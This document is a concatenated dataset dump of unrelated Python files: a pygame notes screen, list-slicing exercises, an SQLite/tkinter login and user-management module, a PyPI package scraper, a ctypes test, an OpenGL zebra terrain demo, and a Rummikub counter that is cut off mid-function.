                                "Drei Kameraden (Erich Maria Remarque)")
    def Note4(self):
        """Render the 'Favourite Games' note."""
        self.construct(text_arr="o To The Moon \no Heavy Rain \no TES 3: Morrowind \no "
                                "Infamous \no The Wolf Among Us \no The Walking Dead \no "
                                "Last Of Us \no Gunpoint \no Faster Than Light \no "
                                "Bad Day LA \no True Crime: Streets Of LA \no Marc Ecko's Getting Up")
    def Note5(self):
        """Render the 'Favourite Music Genres' note."""
        self.construct(text_arr="o Folk Rock \no Electro Swing \no ... \no Actually, i like different genres :-)")
    def Note6(self):
        """Render the 'Favourite Dish' note."""
        self.construct(text_arr="o Bacon")
    def Note7(self):
        """Render the 'Favourite Colour' note."""
        self.construct(text_arr="o Purple")
    def Note8(self):
        """Render the 'About Me' note."""
        self.construct(text_arr="o I'm lazy")
    def construct(self, IMG='images/Quests/1.bmp', text_arr="Nothing", font=19, chk_shw_loc=True):
        """Draw *text_arr* line by line onto a fresh copy of the background.

        text_arr is first word-wrapped by text_to_array(); lines are drawn
        18 px apart starting at y=40.  When chk_shw_loc is True a
        "Show Location" caption is drawn at the top.
        """
        text_arr = self.text_to_array(text_arr)
        self.notes.image = pygame.image.load(IMG)
        self.notes.rect[0] = 210
        self.notes.rect[1] = 50
        if chk_shw_loc:
            text = config.FONTS[18].render("Show Location", True, (21, 61, 34), (0, 0, 0))
            self.notes.image.blit(text, (120, 0))
        coord = 40
        for x in text_arr:
            text = config.FONTS[font].render(x, True, (95, 255, 177), (0, 0, 0))
            self.notes.image.blit(text, (5, coord))
            coord += 18
        self.add(self.notes)
    def text_to_array(self, text):
        """Split *text* into display lines of at most ~29 characters.

        Words containing "\n" force a new line (the "\n" is assumed to be
        the word's first character -- x[1:] strips it); other words are
        appended to the current line while it stays under 29 characters.
        """
        text_array = text.split(' ')
        final_text_array = ['']
        k = 0
        for x in text_array:
            if "\n" in x:
                final_text_array.append("")
                k += 1
                final_text_array[k] += x[1:] + " "
            elif len(x) + len(final_text_array[k]) < 29:
                final_text_array[k] += x + " "
            else:
                final_text_array.append(x + " ")
                k += 1
        return final_text_array
    def handle_resume(self):
        """Restore the tab header text when this submodule regains focus."""
        self.parent.pypboy.header.headline = "DATA"
        self.parent.pypboy.header.title = "Moscow City"
        super(Module, self).handle_resume()
class Notes(game.Entity):
    """Right-hand display surface that a note's text is blitted onto.

    NOTE(review): relies on game.Entity.__init__ having already set
    self.image before get_rect()/convert() are called here -- confirm in
    the base class.
    """
    def __init__(self):
        super(Notes, self).__init__()
        self.rect = self.image.get_rect()
        self.image = self.image.convert()
| true |
52984559f0a6bac359aa34c8c547174925317d28 | Python | mhdmsv89/Hello_World | /Assignments/mirror_in_list.py | UTF-8 | 844 | 3.328125 | 3 | [] | no_license | lst = [100, 120, 130, 140, 150, 160, 170, 180, 190, 200]
mid_lst = len(lst) // 2
lft = lst[mid_lst:]
lft_mirror = lst[:(mid_lst - 1): -1]
print(lft, lft_mirror)
my_lst = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
res_1 = my_lst[:len(my_lst) // 2] + my_lst[len(my_lst) // 2::-1]
res_2 = my_lst[:len(my_lst) // 2], my_lst[len(my_lst) // 2::-1]
res_3 = my_lst[:len(my_lst) // 2], my_lst[len(my_lst) // 2 - 1::-1]
res_4 = my_lst[:len(my_lst) // 2], my_lst[:len(my_lst) // 2][::-1]
res_5 = my_lst[len(my_lst) // 2:][::-1] + my_lst[len(my_lst) // 2:]
print(my_lst)
print(res_1)
print(res_2)
print(res_3)
print(res_4)
print(res_5)
left_lst = lambda lst_1: lst_1[:len(lst_1) // 2] + lst_1[:len(lst_1) // 2][::-1]
right_lst = lambda lst_1: lst_1[len(lst_1) // 2:][::-1] + lst_1[len(lst_1) // 2:]
imp = list(range(1,41))
print(left_lst(imp))
print(right_lst(imp)) | true |
9f8f71906d8451fc45601dc7ee5395052fd33e61 | Python | syurskyi/Python_Topics | /125_algorithms/005_searching_and_sorting/_exercises/exersises/Section 4 Arrays, Searching and Sorting/74.checkdupsorting.py | UTF-8 | 345 | 2.703125 | 3 | [] | no_license | # ___ checkdupsorting myarray
# ?.so..
# print ?
# ___ i __ ra.. 0 le. ?) - 1):
# #print "in for loop:", myarray
# # #print "comparing", myarray[i],"and",myarray[i + 1]
# __(?|? __ ?|? + 1
# print("Duplicates present:" ?|?
# r_
# print("There are No duplicates present in the given array.")
#
# myarray = [3,4,5,6,7,8,7]
# ? ?
| true |
4b3ac3639f6005da56cb62354e60480e974e72a0 | Python | Shmalii/Acces-Control | /Program/database.py | UTF-8 | 5,714 | 2.84375 | 3 | [] | no_license | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import sqlite3
import uuid
from sqlite3 import Error
import hashlib
import tkinter as tk
import tkinter.messagebox
def sql_connection(root):
    """Open (or create) the local SQLite database file.

    Returns the connection on success; on failure shows an error dialog,
    destroys *root* and implicitly returns None.
    """
    try:
        connection = sqlite3.connect('database.db')
    except Error:
        tkinter.messagebox.showerror("Помилка", "Помилка при під'єднанні до бази даних")
        root.destroy()
    else:
        return connection
def hashing(passw, salt):
    """Hash *passw* with *salt* using 1024 chained rounds of SHA-256.

    Returns a ``(hex_digest, salt)`` tuple.

    Bug fix: the original fed the *str* returned by ``hexdigest()``
    straight back into ``hashlib.sha256`` on the next round, which raises
    ``TypeError`` on Python 3 (sha256 requires bytes).  Each round's hex
    digest is now re-encoded to ASCII bytes before being re-hashed; the
    redundant ``bytes.fromhex()``/``.hex()`` round-trip at the end (a
    no-op on a lowercase hex string) was dropped.

    NOTE(review): a plain hash loop is not a real KDF -- consider
    ``hashlib.pbkdf2_hmac`` if stored hashes can be migrated.
    """
    rounds = 1024
    digest = salt.encode() + passw.encode()
    for _ in range(rounds):
        digest = hashlib.sha256(digest).hexdigest().encode()
    return digest.decode(), salt
def sql_table(root, con):
    """Create the ``users`` table if it does not exist yet.

    Columns: username (PK), pass, salt, blocked flag, password-restriction
    flag, admin flag.  On failure shows an error dialog and destroys *root*.
    """
    try:
        cur = con.cursor()
        cur.execute(
            " CREATE TABLE IF NOT EXISTS users(username VARCHAR(30) PRIMARY KEY, pass CHAR(512), salt CHAR(512), blocked TINYINT, "
            "passrestrictions TINYINT, admin TINYINT)")
        con.commit()
    except Error:
        tkinter.messagebox.showerror("Помилка", "Помилка при cтворенні таблиці. Спробуйте пізніше!")
        root.destroy()
def createRoot(root, con):
    """Seed the database with a default "Admin" account.

    Only runs when the ``users`` table is completely empty.  The admin's
    initial password is a single space character, hashed with a random
    uuid4 salt.  On failure shows an error dialog and destroys *root*.
    """
    cursor = con.cursor()
    cursor.execute('SELECT * FROM users')
    if not cursor.fetchall():
        try:
            salt = uuid.uuid4().hex
            credentials = hashing(" ", salt)
            con.cursor().execute('INSERT INTO users VALUES ("Admin", ?,?,0,0,1);', credentials)
            con.commit()
        except Error:
            tkinter.messagebox.showerror("Помилка", "Помилка при створенні адміністратора. Спробуйте пізніше!")
            root.destroy()
def checkpass(usrname, pasw, con):
    """Validate a login attempt against the ``users`` table.

    Returns True when *pasw*, hashed with the stored salt, matches the
    stored hash; otherwise shows an error dialog and returns False (both
    for an unknown user and for a wrong password).
    """
    row = con.cursor().execute('SELECT * FROM users WHERE username=?;', [usrname]).fetchone()
    if row is not None:
        stored_hash, stored_salt = row[1], row[2]
        if stored_hash == hashing(pasw, stored_salt)[0]:
            return True
    tkinter.messagebox.showerror("Помилка", "Помилка при вході, перевірте введені дані!")
    return False
def adduser(username, pasw, con):
    """Create a new (non-admin, unblocked) account.

    Returns False with an error dialog when the username already exists
    or the INSERT fails; returns True with an info dialog on success.
    The password is hashed with a fresh uuid4 salt via hashing().
    """
    curs = con.cursor()
    param = list()
    param.append(username)
    curs.execute('SELECT * FROM users WHERE username=?;', param)
    res = curs.fetchone()
    if res is not None:
        tkinter.messagebox.showerror("Помилка", "Користувач з таким ім'ям вже існує!")
        return False
    else:
        # Build the INSERT parameters: username, hashed password, salt.
        param = list()
        param.append(username)
        salt = uuid.uuid4().hex
        pasw = hashing(pasw, salt)
        param.append(pasw[0])
        param.append(pasw[1])
        try:
            # Trailing 0,0,0 = blocked, passrestrictions, admin flags.
            curs.execute("INSERT INTO users VALUES(?,?,?,0,0,0);", param)
            con.commit()
            tkinter.messagebox.showinfo("Adding", "Користувача додано")
            return True
        except Error:
            tkinter.messagebox.showerror("Помилка", "Помилка під час додавання користувача!")
            return False
def parseusers(con):
    """Return (username, blocked, passrestrictions, admin) rows for all
    users, or None after an error dialog when the query fails."""
    cursor = con.cursor()
    try:
        cursor.execute("SELECT username, blocked,passrestrictions, admin FROM users ")
        rows = cursor.fetchall()
        con.commit()
        return rows
    except Error:
        tkinter.messagebox.showerror("Помилка", "Помилка під час отримання інформації про користувачів!")
        return None
def changesusrinfo(name, blocked, passrestrict, con):
    """Update the blocked / password-restriction flags for *name*.

    Shows an error dialog (and returns None) when the UPDATE fails.
    """
    params = [blocked, passrestrict, name]
    try:
        con.cursor().execute("UPDATE users SET blocked=?,passrestrictions=? WHERE username=?", params)
        con.commit()
    except Error:
        tkinter.messagebox.showerror("Помилка", "Помилка при змінені даних користувача!")
def parseinform(username, con):
    """Return the full users row for *username*, or None if absent."""
    cursor = con.cursor()
    cursor.execute("SELECT * FROM users WHERE username=?", [username])
    return cursor.fetchone()
def checkadmin(username, con):
    """Return the admin flag (column 5) of *username*'s row.

    Raises TypeError when the user does not exist (fetchone() is None).
    """
    cursor = con.cursor()
    cursor.execute("SELECT * FROM users WHERE username=?", [username])
    return cursor.fetchone()[5]
def chck(user, pasw, con):
    """Silently check *pasw* against the stored hash for *user*.

    Duplicate of checkpass() without the error dialogs -- used for
    re-authentication where no UI feedback is wanted.  Raises TypeError
    when the user does not exist (res is None).
    """
    curs = con.cursor()
    param = list()
    param.append(user)
    curs.execute('SELECT * FROM users WHERE username=?;', param)
    res = curs.fetchone()
    passcheck = res[1]
    saltchck = res[2]
    pasw = hashing(pasw, saltchck)[0]
    if passcheck == pasw:
        return True
    else:
        return False
def changepasw(usr, pasw, con):
    """Replace *usr*'s password hash and salt with a freshly salted hash.

    Shows an info dialog on success, an error dialog on failure.
    NOTE(review): the success dialog is shown before commit() -- if the
    commit fails the user still sees "Пароль змінено"; confirm intended.
    """
    params = list()
    salt = uuid.uuid4().hex
    pasw = hashing(pasw, salt)
    params.append(pasw[0])
    params.append(pasw[1])
    params.append(usr)
    try:
        curs = con.cursor()
        curs.execute("UPDATE users SET pass=?, salt=? WHERE username=?", params)
        tkinter.messagebox.showinfo("Зміна", "Пароль змінено")
        con.commit()
    except Error:
        tkinter.messagebox.showerror("Помилка", "Помилка при змінені паролю")
| true |
20174df3b41f6321464bf15c3c63b8a90aff18de | Python | CamDavidsonPilon/python_packages_survey | /utils.py | UTF-8 | 774 | 2.578125 | 3 | [] | no_license | import os
import hashlib
def fetch_from_url_pypi_libraries():
    """Scrape https://pypi.org/simple/ and return the set of all package names.

    Network-bound; imports requests/lxml lazily so the rest of the module
    works without them installed.
    """
    print("Fetching public PYPI libraries.")
    from lxml import html
    import requests
    response = requests.get("https://pypi.org/simple/")
    tree = html.fromstring(response.content)
    # Each anchor's text on the simple index is one package name.
    return set(package for package in tree.xpath('//a/text()'))
def save_pypi_libraries_to_disk():
    """Fetch the current PyPI package-name set and pickle it to packages.pickle."""
    import pickle
    s = fetch_from_url_pypi_libraries()
    with open('packages.pickle', 'wb') as f:
        pickle.dump(s, f)
def load_from_disk_pypi_libraries():
    """Return the package-name set previously pickled by save_pypi_libraries_to_disk().

    NOTE(review): pickle.load executes arbitrary code from the file --
    only safe because packages.pickle is produced locally by this module.
    """
    import pickle
    with open("packages.pickle", 'rb') as f:
        s = pickle.load(f)
    return s
def is_gcp():
    """Return True when running on Google App Engine (GAE_APPLICATION env var set)."""
    return 'GAE_APPLICATION' in os.environ
def md5checksum(s):
    """Hex MD5 digest of the UTF-8 encoding of *s* (non-cryptographic checksum)."""
    return hashlib.md5(s.encode()).hexdigest()
| true |
2b120c22e0df74517b2c3cc2e116240d811d73bc | Python | ronachong/holbertonschool-linux_programming | /0x00-c_dynamic_libraries/100-op-test.py | UTF-8 | 259 | 2.65625 | 3 | [] | no_license | import ctypes
cops = ctypes.CDLL('./100-operations.so')
print(cops.apples("I love"))
print(cops.bananas("I adore"))
print(cops.oranges("I hate.. I'm sorry but I hate"))
print(cops.pineapples("There's nothing better than"))
print(cops.kiwis("except kiwis"))
| true |
af9e1ff0d44ce99fc1b3ebc667fb0e276adb1f41 | Python | rbw214/zebra | /zebratess.py | UTF-8 | 15,301 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python3
#Brady Kruse
#bak225
#Braden Wells
#rbw214
'''
Various Citations:
1) 2D Noise based on Morgan McGuire @morgan3d
https://www.shadertoy.com/view/4dS3Wd
Introduced to us by Book of Shaders
https://thebookofshaders.com/11/
2) ModernGL template projects
https://github.com/moderngl/moderngl
3) Dr. TJ's Tessellation Example Code
(Thank you!)
CONTROLS:
W/S to move forward/backward
Q/E to move up/down
A/D to strafe left/right
Left and Right arrows to turn
Z/X to zoom in/out
T/Y to enable/disable automatic turning and movement
K to swap models
'''
# Here they come, it's the modules
import numpy as np
from pyrr import Matrix44, Quaternion, Vector3, vector
import moderngl
from ported._example import Example #Base class for our world
from moderngl_window.geometry.attributes import AttributeNames # pylint: disable=no-name-in-module
# Noise algorithm
# Not quite working, unused, you can skip this part
def doRandom(st):
    """Hash-like pseudo-random value in [0, 1) derived from a 2-D point.

    Same sin/dot construction as the classic GLSL one-liner credited to
    Morgan McGuire in the file header.
    """
    seed = np.dot(st, [12.9898, 78.233])
    scaled = np.sin(seed) * 43758.5453123
    return abs(scaled - np.floor(scaled))
def lerp(a, b, val):
    """Linear interpolation between *a* and *b*: a at val == 0, b at val == 1."""
    return b * val + a * (1 - val)
def noise (st):
    """Value-noise sample at 2-D point *st* (smoothstep-blended corner hashes).

    Ported from the Book of Shaders 2-D noise cited in the file header.
    Marked "not quite working, unused" above -- kept as-is.
    NOTE(review): np.modf on negative coordinates yields a negative
    fractional part before abs(), which likely breaks the interpolation
    there; confirm if this function is ever revived.
    """
    st = np.array(st)
    XYScale = 20.0
    ZScale = 1.0 / 20.0
    st = XYScale * st
    # integer lattice cell and fractional position within it
    i = np.floor(st)
    f = abs(np.modf(st)[0])
    # hash the four cell corners
    a = doRandom(i)
    b = doRandom(i + [1.0, 0.0])
    c = doRandom(i + [0.0, 1.0])
    d = doRandom(i + [1.0, 1.0])
    # smoothstep weights
    u = f * f * ( 3.0 - (2.0 * f) )
    val = lerp(a, b, u[0]) + (c - a) * u[1] * (1.0 - u[0]) + (d - b) * u[0] * u[1]
    return abs(val * ZScale)
# Camera class modified from simple_camera.py
class Camera():
    """First/third-person camera: position + yaw angle, building a pyrr
    look-at matrix and a perspective projection matrix on every change.

    Axis convention (from the vectors below): +Z is "down" (up vector is
    [0, 0, -1]) and the yaw angle sweeps the XY plane.
    """
    def __init__(self, ratio):
        """Set movement/zoom speeds, projection parameters (aspect *ratio*),
        and the starting pose, then build both matrices."""
        # Camera speeds
        self._zoom_step = 0.2
        self._move_vertically = 0.001
        self._move_horizontally = 0.001
        self._rotate_horizontally = -0.02
        self._rotate_vertically = 0.02
        # Angle of rotation
        self.angle = 0
        # Distance back the camera moves
        self.dist = 0.1
        # Projection? In my camera? It's more likely than you think
        self._field_of_view_degrees = 60.0
        self._z_near = 0.01
        self._z_far = 35
        self._ratio = ratio
        self.build_projection()
        # What are you looking at? Huh?
        # I'm looking at a zebra
        self.camera_position = Vector3([-.1, 0.03, -.06]) #Default camera values
        self.camera_front = Vector3([0.0, 1.0, 0.0])
        self._camera_up = Vector3([0.0, 0.0, -1.0])
        self._cameras_target = (self.camera_position + self.camera_front)
        self.build_look_at()
    # What if you could like zoom in, but in real life?
    def zoom_in(self):
        """Narrow the field of view by one zoom step."""
        self._field_of_view_degrees = self._field_of_view_degrees - self._zoom_step
        self.build_projection()
    # Oh wait never mind you can just get closer
    def zoom_out(self):
        """Widen the field of view by one zoom step."""
        self._field_of_view_degrees = self._field_of_view_degrees + self._zoom_step
        self.build_projection()
    # Do hot sine-cosine action on the angle to get x-y vectors of movement
    # Then scale it down because cos(0) == 1 and moving 1 in GL space is B A D
    def move_forward(self):
        """Step along the current facing direction in the XY plane."""
        self.camera_position = self.camera_position + Vector3([np.cos(self.angle),np.sin(self.angle), 0.0 ]) * self._move_horizontally
        self.build_look_at()
    def move_backwards(self):
        """Step opposite the current facing direction in the XY plane."""
        self.camera_position = self.camera_position - Vector3([np.cos(self.angle),np.sin(self.angle), 0.0 ]) * self._move_horizontally
        self.build_look_at()
    # Same as forwards and backwards, except add in a pretty little 90 degree turn
    def strafe_left(self):
        """Sidestep left (facing direction rotated +90 degrees)."""
        self.camera_position = self.camera_position - Vector3([np.cos(self.angle + np.pi / 2),np.sin(self.angle + np.pi / 2), 0.0 ]) * self._move_horizontally
        self.build_look_at()
    def strafe_right(self):
        """Sidestep right (facing direction rotated +90 degrees, reversed)."""
        self.camera_position = self.camera_position + Vector3([np.cos(self.angle + np.pi / 2),np.sin(self.angle + np.pi / 2), 0.0 ]) * self._move_horizontally
        self.build_look_at()
    # Thankfully, the up vector never changes, so we can just add/subtract that
    def strafe_up(self):
        """Move along the up vector."""
        self.camera_position = self.camera_position + self._camera_up * self._move_vertically
        self.build_look_at()
    def strafe_down(self):
        """Move against the up vector."""
        self.camera_position = self.camera_position - self._camera_up * self._move_vertically
        self.build_look_at()
    '''
    # Oh, that's rotate-holm
    # ...We don't go there anymore.
    # (is that reference forced? i dunno)
    # (we just decided these were too complex to add to the new rotation system we use)
    def rotate_up(self):
        self.camera_front.z -= float(self._rotate_vertically)
        self.build_look_at()
    def rotate_down(self):
        self.camera_front.z += float(self._rotate_vertically)
        self.build_look_at()
    '''
    # The beauty of this system: just add or subtract to the angle!
    def rotate_left(self):
        """Turn left by one rotation step (note _rotate_horizontally is negative)."""
        self.angle += self._rotate_horizontally
        self.build_look_at()
    def rotate_right(self):
        """Turn right by one rotation step."""
        self.angle -= self._rotate_horizontally
        self.build_look_at()
    # Slow rotation for the auto spin/move
    def slow_rotate_right(self):
        """Turn right at one fifth of the normal rotation speed (auto mode)."""
        self.angle -= self._rotate_horizontally / 5
        self.build_look_at()
    # Generate the look-at matrix with the following setup:
    # Camera_position is the look-at point
    # Camera_target is the eye point (just the position, except moved opposite the angle)
    # the up is up, up is always up, up up up up up up up
    def build_look_at(self):
        """Rebuild mat_lookat for the current position/angle.

        Clamps the position to z <= ground (0.0; the noise-based ground
        height is commented out) and raises the eye point slightly for an
        over-the-shoulder view.
        """
        #ground = noise(np.array(self.camera_position.xy)) - 0.02
        ground = 0.0
        if self.camera_position.z > ground:
            self.camera_position.z = ground
        self._camera_dist = Vector3([np.cos(self.angle), np.sin(self.angle), 0]) * self.dist
        self.camera_target = self.camera_position - self._camera_dist
        # Move camera up slightly to get over-shoulder view type deal
        self.camera_target.z -= 0.04
        self.mat_lookat = Matrix44.look_at(
            self.camera_target,
            self.camera_position,
            self._camera_up)
    # Make a lovely projection matrix out of the stuff that they're always made of
    def build_projection(self):
        """Rebuild mat_projection from the current FOV, aspect ratio and clip planes."""
        self.mat_projection = Matrix44.perspective_projection(
            self._field_of_view_degrees,
            self._ratio,
            self._z_near,
            self._z_far)
class Zebra(Example):
    """Main moderngl-window scene: a tessellated terrain plus either a
    zebra model or a multi-part car model, toggled with the K key.

    Resource files (shaders, OBJ models, textures) are loaded from the
    example's resource directories via the Example base class.
    """
    title = "Zebra Land"
    gl_version = (4, 1)
    def __init__(self, **kwargs):
        """Compile shaders, upload geometry/textures, and set up camera + key state."""
        super().__init__(**kwargs)
        # Shaders for the terrain/world/floor/sludge
        self.prog = self.load_program('world.glsl')
        #Passing in of uniforms
        self.mvp = self.prog['Mvp']
        self.time = self.prog['time']
        self.camera_position = self.prog['camera_position']
        self.scale = self.prog['scale']
        # four vertices define a quad
        self.ctx.patch_vertices = 4
        vertices = np.array([
            [-1.0, -1.0],
            [ 1.0, -1.0],
            [ 1.0, 1.0],
            [-1.0, 1.0],
        ])
        vbo = self.ctx.buffer(vertices.astype('f4').tobytes())
        self.vao = self.ctx.simple_vertex_array(self.prog, vbo, 'in_vert')
        # Create a custom attribute name spec
        # so attribute names are not forced to follow gltf standard
        attr_names = AttributeNames(position='in_vert', texcoord_0='in_tex', normal='in_norm', color_0 = "color")
        # Shaders for zebra/car/whatever it takes
        self.zprog = self.load_program('zebra.glsl')
        # Uniforms for that
        self.zlight = self.zprog['Light']
        self.zmvp = self.zprog['Mvp']
        self.zuse = self.zprog['ZebraUse']
        self.zcolor = self.zprog['color']
        self.zrotate = self.zprog['Rotate']
        self.ztime = self.zprog['time']
        # zebraTime: True = draw the zebra, False = draw the car.
        # zebraPressed: edge-detect latch so one K press toggles once.
        self.zebraTime = False
        self.zebraPressed = False
        # Get our zebra in town
        self.zebra = self.load_scene('Zebra_OBJ.obj', attr_names=attr_names)
        self.texture = self.load_texture_2d('Zebra_skin_colors.jpg')
        self.vao2 = self.zebra.root_nodes[0].mesh.vao.instance(self.zprog)
        # Car (brought to you by "Educational Purposes")
        # Maps each part's OBJ filename to its flat RGB colour.
        self.carDict = {
            "mini_body.obj" : [0,0,0],
            "mini_brakes.obj" : [0.75, 0.75, 0.75],
            "mini_glass.obj" : [0.5, 0.5, 0.5],
            "mini_interior.obj" : [0.33, 0.1, 0.02],
            "mini_parts.obj" : [0.2, 0.2, 0.2],
            "mini_rims.obj" : [0.95, 0.95, 0.93],
            "mini_tires.obj" : [0.1, 0.1, 0.1],
            "mini_underpart.obj" : [0,0,0],
        }
        # Load our car into a dictionary so that we can run through all the parts
        self.car = {}
        self.car["texture"] = self.load_texture_2d('mini_body_diffuse.png')
        for i in self.carDict:
            self.car[i] = {}
            self.car[i]["model"] = self.load_scene(i, attr_names=attr_names)
            self.car[i]["vao"] = self.car[i]["model"].root_nodes[0].mesh.vao.instance(self.zprog)
        # Keybinds, camera setup.
        self.camera = Camera(self.aspect_ratio)
        # World scale (change to your heart's content)
        self.camera.scale = 256
        # Wow that's a few keys, I tell ya what
        self.states = {
            self.wnd.keys.W: False,
            self.wnd.keys.S: False,
            self.wnd.keys.Q: False,
            self.wnd.keys.E: False,
            self.wnd.keys.A: False,
            self.wnd.keys.D: False,
            self.wnd.keys.UP: False,
            self.wnd.keys.DOWN: False,
            self.wnd.keys.Z: False,
            self.wnd.keys.X: False,
            self.wnd.keys.LEFT: False,
            self.wnd.keys.RIGHT: False,
            self.wnd.keys.T: False,
            self.wnd.keys.I: False,
            self.wnd.keys.Y: False,
            self.wnd.keys.K: False,
        }
    # Move_camera copied wholesale from simple_camera.py
    # (except the zebra part)
    def move_camera(self):
        """Apply one frame's worth of camera movement from the key-state map.

        T/Y latch auto-move (W) and auto-turn (I) on/off; K toggles
        zebra/car once per physical press via the zebraPressed latch.
        """
        if self.states.get(self.wnd.keys.W):
            self.camera.move_forward()
        if self.states.get(self.wnd.keys.S):
            self.camera.move_backwards()
        if self.states.get(self.wnd.keys.Q):
            self.camera.strafe_up()
        if self.states.get(self.wnd.keys.E):
            self.camera.strafe_down()
        if self.states.get(self.wnd.keys.A):
            self.camera.strafe_left()
        if self.states.get(self.wnd.keys.D):
            self.camera.strafe_right()
        '''
        if self.states.get(self.wnd.keys.UP):
            self.camera.rotate_up()
        if self.states.get(self.wnd.keys.DOWN):
            self.camera.rotate_down()
        '''
        if self.states.get(self.wnd.keys.LEFT):
            self.camera.rotate_left()
        if self.states.get(self.wnd.keys.RIGHT):
            self.camera.rotate_right()
        if self.states.get(self.wnd.keys.Z):
            self.camera.zoom_in()
        if self.states.get(self.wnd.keys.X):
            self.camera.zoom_out()
        if self.states.get(self.wnd.keys.I):
            self.camera.slow_rotate_right()
        if self.states.get(self.wnd.keys.T):
            self.states[self.wnd.keys.W] = True
            self.states[self.wnd.keys.I] = True
        if self.states.get(self.wnd.keys.Y):
            self.states[self.wnd.keys.W] = False
            self.states[self.wnd.keys.I] = False
        # If K is pressed, toggle that zebra!
        # But also only trigger it once per press
        # Else ye must face the horror of the transmogrifying zebra-car
        if self.states.get(self.wnd.keys.K):
            if not self.zebraPressed:
                self.zebraTime = not self.zebraTime
                self.zebraPressed = True
        else:
            self.zebraPressed = False
    def key_event(self, key, action, modifiers):
        """Record press/release of tracked keys; log untracked ones."""
        if key not in self.states:
            print(key, action)
            return
        if action == self.wnd.keys.ACTION_PRESS:
            self.states[key] = True
        else:
            self.states[key] = False
    # It's time to actually see stuff!
    def render(self, time, frame_time):
        """Per-frame draw: update camera, upload uniforms, draw terrain,
        then draw either the car or the zebra oriented to the camera yaw."""
        # Move our camera depending on keybinds
        self.move_camera()
        # Black background, turn on depth
        self.ctx.clear(0.0, 0.0, 0.0)
        self.ctx.enable(moderngl.DEPTH_TEST)
        # Set our world scale for tessellation
        self.scale.write(np.float32(self.camera.scale).astype('f4').tobytes()) # pylint: disable=too-many-function-args
        # Put projection and look-at matrix into uniform
        self.mvp.write((self.camera.mat_projection * self.camera.mat_lookat).astype('f4').tobytes())
        # Setup time, camera_position into shaders
        self.time.write(np.float32(time*0.2).astype('f4').tobytes()) # pylint: disable=too-many-function-args
        self.camera_position.write(self.camera.camera_position.xy.astype('f4').tobytes())
        # Tessellate that floor!
        self.vao.render(moderngl.PATCHES)
        # ZEBRA TIME
        # Put in projection, camera position (which we call light for some reason?), and the time
        self.zmvp.write((self.camera.mat_projection * self.camera.mat_lookat).astype('f4').tobytes())
        self.zlight.write((self.camera.camera_position).astype('f4').tobytes())
        self.ztime.write(np.float32(time*0.2).astype('f4').tobytes()) # pylint: disable=too-many-function-args
        self.zuse.write(np.float32(self.zebraTime).astype('f4').tobytes()) # pylint: disable=too-many-function-args
        if not self.zebraTime:
            # Make the car look forwards properly
            wheresMyCar = Matrix44.from_translation([0, 0, -0.02])
            wheresMyCar = Matrix44.from_x_rotation(np.pi) * wheresMyCar
            wheresMyCar = Matrix44.from_z_rotation((np.pi / 2) - self.camera.angle) * wheresMyCar
            # Put that movement into the shader
            self.zrotate.write((wheresMyCar).astype('f4').tobytes())
            # Set our texture, then render every part of the car with the right color
            self.car["texture"].use()
            for i in self.carDict:
                color = self.carDict[i]
                self.zcolor.write(np.array(color).astype('f4').tobytes())
                self.car[i]["vao"].render()
        else:
            # We need to get our zebra looking the right way and also slightly lower than where he starts
            rotateMyZebra = Matrix44.from_translation([0, -0.05, 0])
            rotateMyZebra = Matrix44.from_x_rotation(np.pi / 2) * rotateMyZebra
            rotateMyZebra = Matrix44.from_z_rotation((np.pi / 2) - self.camera.angle) * rotateMyZebra
            # Put that movement into the shader
            self.zrotate.write((rotateMyZebra).astype('f4').tobytes())
            # Show us the zebra!
            self.texture.use()
            self.vao2.render()
if __name__ == '__main__':
    # Launch the moderngl-window example loop (blocks until the window closes).
    Zebra.run()
| true |
4eb5d206c670cf9b4eaee6f44d267c3ad6c5bda9 | Python | fRomke/rummi | /rummi_reverse.py | UTF-8 | 3,941 | 2.90625 | 3 | [] | no_license | from rummi_util import initTable, memoryUsage
from rummi_output import writeResult, printTableToConsole
from itertools import chain
import c_rummikub
from sys import argv
from timeit import default_timer
# Number of tile colours in the set.
colors = 4
copies = 2 # ONLY WORKS FOR 2 -- removeDups' flip symmetries assume two copies
def findSubsets(solutions, reference, to_remove, i=0):
    """Append to *solutions* every count-vector reachable from *reference*
    by removing exactly *to_remove* tiles from positions >= *i*.

    Positions are visited in ascending order; at each position 1..to_remove
    tiles may be taken, recursing on later positions for the remainder.
    When to_remove is 0 the reference list itself is appended.
    """
    if to_remove == 0:
        solutions.append(reference)
        return
    size = len(reference)
    for pos in range(i, size):
        for taken in range(1, to_remove + 1):
            candidate = reference[:]
            candidate[pos] = candidate[pos] - taken
            remaining = to_remove - taken
            if remaining != 0:
                findSubsets(solutions, candidate[:], remaining, pos + 1)
            else:
                solutions.append(candidate)
def removeDups(solutions):
    """Collapse symmetric duplicates in *solutions* (consumed destructively).

    Each flat table is viewed as a colors x stones 2-D grid (module-global
    ``colors``); for every solution the X-flip, Y-flip and XY-flip variants
    are searched for and deleted, and the survivor is returned paired with
    a multiplicity count 1..4.  NOTE(review): list.index inside findAndDel
    makes this O(n^2) in the number of solutions.
    """
    def twoDimensionize(table):
        # Reshape the flat table into `colors` rows of equal length.
        chunk = 0
        stones = int(len(table)/colors)
        table_2D = []
        for c in range(colors):
            table_2D.append(table[chunk:(chunk+stones)])
            chunk += stones
        return table_2D
    def flipOverY(table):
        # Mirror each colour-row left/right, then flatten again.
        newtable_2D = []
        for each in twoDimensionize(table):
            each.reverse()
            newtable_2D.append(each)
        return list(chain(*newtable_2D))
    def flipOverX(table):
        # Reverse the order of the colour-rows, then flatten again.
        newtable_2D = twoDimensionize(table)
        newtable_2D.reverse()
        return list(chain(*newtable_2D))
    def flipOverXY(table):
        # Full reversal of the flat table (both flips combined).
        newtable = table[:]
        newtable.reverse()
        return newtable
    def findAndDel(it, count):
        # Delete one occurrence of `it` from solutions; 1 if found, 0 if not.
        try:
            id = solutions.index(it)
            del solutions[id]
            return 1
        except ValueError:
            return 0
    count = 0
    multisol = []
    while(solutions):
        sol = solutions.pop(0)
        multiplier = 1
        multiplier += findAndDel(flipOverX(sol), count)
        multiplier += findAndDel(flipOverXY(sol), count)
        multiplier += findAndDel(flipOverY(sol), count)
        multisol.append((sol, multiplier))
        count += 1
    return multisol
def reverseCount(hand, stones, colors, copies, cores):
    """Count winning Rummikub hands of size *hand* top-down.

    Starting from the full table (stones * copies * colors tiles), all
    distinct subsets with (maxhand - hand) tiles removed are generated,
